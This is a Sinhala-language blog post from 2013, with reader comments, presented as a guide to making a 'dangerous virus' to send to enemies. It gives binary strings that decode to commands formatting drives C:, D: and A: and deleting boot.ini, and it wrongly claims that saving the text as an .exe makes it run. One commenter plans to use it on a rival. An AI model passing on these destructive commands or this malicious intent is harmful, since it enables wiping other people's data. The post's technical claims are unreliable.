Posted by : yasiru Saturday, June 29, 2013



අද මම ගෙනාවෙ අපේ කොල්ලන්ට අලුත් දෙයක් .ඒ තමයි පොඩි භයානක වයිරස් එකක් හදන හැටි කියල දෙන්න.මට වැඩිය කතාකරන්න වෙලාව නැහැ.මම කියල දීපු විදියට වැඩේ කරල මැබැයි මට කියන්න එන්න එපා ඔන්න පීසී එකට බඩු ගියා කියලා.තමන්ගෙ තරහකාරයෙක් ඉන්නවනම් මේක යවන්න තියෙන්නෙ.කමෙන්ට් එකකුත් දාල යන්න අමතක කරන්න එපා.අත්හදා බලන්න කලින් කමෙන්ට් කරන්න මොකද අත්හදා බැලුවම පස්සෙ සිංහපීඩියාව පැත්ත පලාතෙ එන්න හිතෙන එකක් නෑ.

  මම ඔය පල්ලෙහයින් දීල තියන අංක ටිකෙන් කැමති එකක් Notepad එකක කොපි කරගෙන Save as දීල Save as type කියන එකට All files දීල, File name කියන තැනට ඔයාලට ඕනි නමක් දීල අන්තිමට .exe විදිහට දීල save කරන්න.



01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
මේ කෝඩ් එකෙන් වෙන්නේ Local Disk C එක Format වෙනවා. ආය නෝ කතා නෝ සිනා...


01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
මේකෙන් Local Disk D එක Format වෙනවා.


01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
මේකෙන් A එකලු. අනේ මන්ඳා මගෙ නම් A එකක් නෑ


01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
මේකෙන් වෙන්නේ PC එක බූට් වෙන්න අත්‍යවශ්‍යය System File එකක් වෙන Boot.ini කියන ෆයිල් එක මැකෙනවා. මේකනම් හෙන Dangerous. මොකො මෙහෙම කරොත් PC එක ආයෙ Boot වෙන්නේ නෑ.

{ 7 අදහස්... read them below or Comment }

  1. එල එල අද දෙන්නම් බැටේ!

    සිතුම් සයුර

    ReplyDelete
  2. මල ඉලව්වයි. මේව කැත වැඩනේ මලයෝ අර උඩ එකාත් දෙන්න හදන්නේ ගේම.

    ReplyDelete
  3. නලීන් අයියේ ඉතිං ඔයාත් ගේමක් දෙන්න

    ReplyDelete
  4. මගේ තරහා කාරයෙක් ඉන්නවා. උට මේක දීලා හුකෝලා ගන්නම්. :)
    තෑන්ක්ස් මල්ලි !

    ReplyDelete
  5. malli, umba kiyanawa coment daala yanna kiyala, ea unata cment walata reply na. Anik blog asse gihin ape paththeth enna kiyala cment karanda kalin, umbe blog eka blanda ena ayage comments walata reply karapan.
    Loku oluwen indala comments balaporoththu wenda epa...mama nam cment karanawa oni ekakata. Eth hemoma ehema na.

    Thawa dheyak, malli me wage post nam epa kiyalai mata hithenne. Mkada mea wage dhekin hoda minihekta kisima prayojanayak na. Naraka ewun athata naraka dheyak path unahama wena dhe amuthuwen kiyanda oni nahane.
    Hoda dheyak karapan. Ara itihasaya gana umba mahansi wela daana post tika bohoma wadagath.

    ReplyDelete

Welcome

ඕහ්..තවම member කෙනෙක් වුණේ නැත්ද

▪ අලුත් විදියට හිතන්න 
▪ අලුත් දේ ඉගෙන ගන්න 
▪ අලුත් දේ කරන්න 
▪ අපිත් එක්ක එකතු වෙන්න 
▪ ඔයත් දැන්ම සාමාජිකයෙක් වෙන්න.

Followers

Sunday 7.30 a.m

Online සිංහයින්


- Copyright © සිංහPedia -SinHaPedia.com- Powered by SinHaPedia INC - Designed by Yasiru Udana Ransara -